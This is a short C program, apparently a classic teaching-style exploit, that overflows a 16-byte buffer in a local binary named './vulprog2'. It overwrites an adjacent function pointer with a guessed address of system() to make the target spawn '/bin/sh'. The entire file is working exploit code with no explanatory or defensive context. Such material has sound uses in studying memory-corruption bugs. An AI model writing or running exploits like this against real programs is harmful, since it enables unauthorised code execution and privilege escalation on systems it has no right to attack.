#include <stdio.h>
#include <stdlib.h>  
#include <unistd.h>  
#include <string.h>  
#define BUFSIZE 16 /* the estimated diff between funcptr/buf in vulprog */  
#define VULPROG "./vulprog2" /* vulnerable program location */  
#define CMD "/bin/sh" /* command to execute if successful */  
#define ERROR -1

int main(int argc, char **argv) 
{ 
	register int i; 
	u_long sysaddr; 
	static char buf[BUFSIZE + sizeof(u_long) + 1] = {0}; 	 
	if (argc <= 1) 
	{
		fprintf(stderr, "Usage: %s <offset>\n", argv[0]); 
		fprintf(stderr, "[offset = estimated system() offset in vulprog\n\n"); 	 
		exit(ERROR);
	} 	
	sysaddr = (u_long)&system -atoi(argv[1]);
	printf("Trying system() at 0x%lx\n", sysaddr); 	 
	memset(buf, 'A', BUFSIZE);

	for (i = 0; i < sizeof(sysaddr); i++) 	 
		buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; 	 

	execl(VULPROG, VULPROG, buf, CMD, NULL); 	 
	return 0; 	 
}
  
